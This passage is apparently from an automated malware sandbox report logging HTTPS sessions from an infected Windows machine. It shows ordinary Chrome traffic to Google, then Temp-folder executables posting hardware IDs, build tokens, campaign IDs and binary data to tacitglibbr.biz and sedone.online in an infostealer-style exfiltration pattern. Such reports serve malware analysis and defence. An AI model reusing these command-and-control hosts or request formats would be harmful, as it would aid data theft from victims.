61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 26fc)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 37 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700307,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){var window\u003dthis
2024-12-16 10:04:06 UTC	1390	IN	Data Raw: 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 4c 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 4b 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 4e 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d Data Ascii: or(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ld\u003dfunction(a){return new _.Kd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Md\u003dglobalThis.trustedTypes;_.Nd\u003dclass{constructor(a){this.i\u003da}
2024-12-16 10:04:07 UTC	1276	IN	Data Raw: 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 65 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4e 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 62 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 64 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c Data Ascii: (\"F\");};_.be\u003dfunction(a){if(ae.test(a))return a};_.ce\u003dfunction(a){if(a instanceof _.Nd)if(a instanceof _.Nd)a\u003da.i;else throw Error(\"F\");else a\u003d_.be(a);return a};_.de\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\
2024-12-16 10:04:07 UTC	387	IN	Data Raw: 31 37 63 0d 0a 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c Data Ascii: 17c\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelector(a?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|nul
2024-12-16 10:04:07 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 6f 72 5c 22 3f 61 2e 68 74 6d 6c 46 6f 72 5c 75 30 30 33 64 63 3a 6f 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 64 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 65 5b 64 5d 2c 63 29 3a 5f 2e 6a 65 28 64 2c 5c 22 61 72 69 61 2d 5c 22 29 7c 7c 5f 2e 6a 65 28 64 2c 5c 22 64 61 74 61 2d 5c 22 29 3f 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 64 2c 63 29 3a 61 5b 64 5d 5c 75 30 30 33 64 63 7d 29 7d 3b 6f 65 5c 75 30 30 33 64 7b 63 65 6c 6c 70 61 64 64 69 6e 67 3a 5c 22 63 65 6c 6c 50 61 64 64 69 6e 67 5c 22 2c 63 65 6c 6c 73 70 61 63 69 6e 67 3a 5c 22 63 65 6c 6c 53 70 61 63 69 6e 67 5c 22 2c 63 6f 6c 73 70 61 6e 3a 5c 22 63 6f 6c 53 70 61 6e 5c 22 2c 66 Data Ascii: 8000\u003dc:d\u003d\u003d\"for\"?a.htmlFor\u003dc:oe.hasOwnProperty(d)?a.setAttribute(oe[d],c):_.je(d,\"aria-\")\|\|_.je(d,\"data-\")?a.setAttribute(d,c):a[d]\u003dc})};oe\u003d{cellpadding:\"cellPadding\",cellspacing:\"cellSpacing\",colspan:\"colSpan\",f

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49945	172.217.21.36	443	3552	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:06 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-16 10:04:07 UTC	933	IN	HTTP/1.1 200 OK Version: 704583840 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Mon, 16 Dec 2024 10:04:06 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-16 10:04:07 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-16 10:04:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49949	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:06 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=8YOWNNU5C1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15029 Host: tacitglibbr.biz
2024-12-16 10:04:06 UTC	15029	OUT	Data Raw: 2d 2d 38 59 4f 57 4e 4e 55 35 43 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 38 59 4f 57 4e 4e 55 35 43 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 59 4f 57 4e 4e 55 35 43 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 38 59 4f 57 4e 4e 55 35 43 31 0d 0a 43 6f 6e 74 65 6e 74 2d Data Ascii: --8YOWNNU5C1Content-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--8YOWNNU5C1Content-Disposition: form-data; name="pid"2--8YOWNNU5C1Content-Disposition: form-data; name="lid"PsFKDg--pablo--8YOWNNU5C1Content-
2024-12-16 10:04:08 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=e9586qjbgv8989kpb29l7jn534; expires=Fri, 11-Apr-2025 03:50:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KjZwa860XHoQD0EnEAzUgSCfQmRtFZucncG9vP8Vf3qrsTINxawwf3%2Bnpu4ry1TyW4QZ6eWMMTz4mdZFx8VneTzun0Zec28B26oul011POqWs3uxCzRgxHZ8qiTDEKDbFzQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd8ee089042bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1594&rtt_var=615&sent=15&recv=20&lost=0&retrans=0&sent_bytes=2840&recv_bytes=15960&delivery_rate=1753753&cwnd=193&unsent_bytes=0&cid=3da05389ac2982b8&ts=1724&x=0"
2024-12-16 10:04:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2024-12-16 10:04:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49953	104.21.50.161	443	2876	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:08 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-16 10:04:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-16 10:04:10 UTC	1012	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7jh14o0cd6ss7rg9134m03v9j6; expires=Fri, 11-Apr-2025 03:50:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FtxlAYvagcGiLC3gXCSYkwDAGYcky%2FFZ4PaNylQXqCuMCkjZUxOSPd22OXcQcEMsp8F5wIUBrZSq0rD8ojOO3gTNYDH8ttgG%2FG27kLnSfEVAN5NGwrz8ucSNc28AV9Lnt8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd8f73f4b42ea-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1539&min_rtt=1531&rtt_var=590&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=906&delivery_rate=1829573&cwnd=143&unsent_bytes=0&cid=5960b251f2f0bd5f&ts=2424&x=0"
2024-12-16 10:04:10 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-16 10:04:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49967	116.203.12.114	443	1084	C:\Users\user\AppData\Local\Temp\1016043001\95bf820dd4.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:09 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----UAIMGDBAS0ZM7Q90HDJM User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: sedone.online Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-16 10:04:09 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 55 41 49 4d 47 44 42 41 53 30 5a 4d 37 51 39 30 48 44 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 36 32 63 30 31 38 38 32 63 38 32 36 33 39 39 37 35 31 36 66 64 34 62 36 33 36 33 62 38 38 61 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 4d 47 44 42 41 53 30 5a 4d 37 51 39 30 48 44 4a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 41 49 4d 47 44 42 41 53 30 5a 4d 37 51 39 30 48 44 4a 4d 0d 0a 43 6f 6e 74 Data Ascii: ------UAIMGDBAS0ZM7Q90HDJMContent-Disposition: form-data; name="token"e62c01882c8263997516fd4b6363b88a------UAIMGDBAS0ZM7Q90HDJMContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------UAIMGDBAS0ZM7Q90HDJMCont
2024-12-16 10:04:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 16 Dec 2024 10:04:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-16 10:04:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49970	104.21.50.161	443	6256	C:\Users\user\AppData\Local\Temp\1016044001\ccdb824191.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 10:04:10 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=7P9ASF2NTGH9FRVE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20555 Host: tacitglibbr.biz
2024-12-16 10:04:10 UTC	15331	OUT	Data Raw: 2d 2d 37 50 39 41 53 46 32 4e 54 47 48 39 46 52 56 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 44 42 32 45 45 35 34 38 36 46 32 32 37 37 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 37 50 39 41 53 46 32 4e 54 47 48 39 46 52 56 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 50 39 41 53 46 32 4e 54 47 48 39 46 52 56 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 37 50 Data Ascii: --7P9ASF2NTGH9FRVEContent-Disposition: form-data; name="hwid"1DB2EE5486F2277BAC8923850305D13E--7P9ASF2NTGH9FRVEContent-Disposition: form-data; name="pid"3--7P9ASF2NTGH9FRVEContent-Disposition: form-data; name="lid"PsFKDg--pablo--7P
2024-12-16 10:04:10 UTC	5224	OUT	Data Raw: 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 Data Ascii: MMZh'F3Wun 4F([:7s~X`nO`i
2024-12-16 10:04:13 UTC	1016	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 10:04:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0f9hdr6sbfbaluq39emgi50th9; expires=Fri, 11-Apr-2025 03:50:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RLWJ%2B5IHCphJ7UDtsxn%2BCmJNoYNL2uavSLaW6ZDc4fUSqzXP2Dbt9pgHGLHIaqCArYJrFsL3WDU7tax6tMSj0HZW2tA7WrLTGHIu2TKNl4KKIPKcFQkFDIr%2BYjAjNggkkfE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2dd907a9a372a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1950&rtt_var=742&sent=14&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21514&delivery_rate=1465127&cwnd=177&unsent_bytes=0&cid=c38ffc1f1e5bdf65&ts=3058&x=0"
